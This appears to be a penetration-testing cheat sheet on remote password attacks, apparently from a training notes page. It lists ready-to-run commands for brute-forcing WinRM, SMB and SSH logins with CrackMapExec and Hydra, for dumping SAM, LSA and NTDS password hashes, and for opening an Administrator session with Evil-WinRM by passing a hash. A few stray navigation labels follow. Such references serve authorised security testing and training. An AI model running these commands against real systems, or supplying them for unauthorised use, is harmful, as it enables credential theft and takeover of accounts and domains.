Remote Password Attacks
# Brute-force WinRM service
crackmapexec winrm <ip> -u user.list -p password.list
# Enumerate SMB shares using specified credentials
crackmapexec smb <ip> -u "user" -p "password" --shares
# Attempt password cracking over specified service with Hydra
hydra -L user.list -P password.list <service>://<ip>
hydra -l username -P password.list <service>://<ip>
hydra -L user.list -p password <service>://<ip>
hydra -C <user_pass.list> ssh://<IP>
# Dump password hashes using CrackMapExec
crackmapexec smb <ip> --local-auth -u <username> -p <password> --sam
crackmapexec smb <ip> --local-auth -u <username> -p <password> --lsa
crackmapexec smb <ip> -u <username> -p <password> --ntds
# Establish a PowerShell session using Evil-WinRM
evil-winrm -i <ip> -u Administrator -H "<passwordhash>"Netexec
Connect with target (Evil-winrm)
Hydra
Connect with target
Hydra
Connect with target
Hydra
Metasploit module smb_login
smb_loginSee share and privileges
Last updated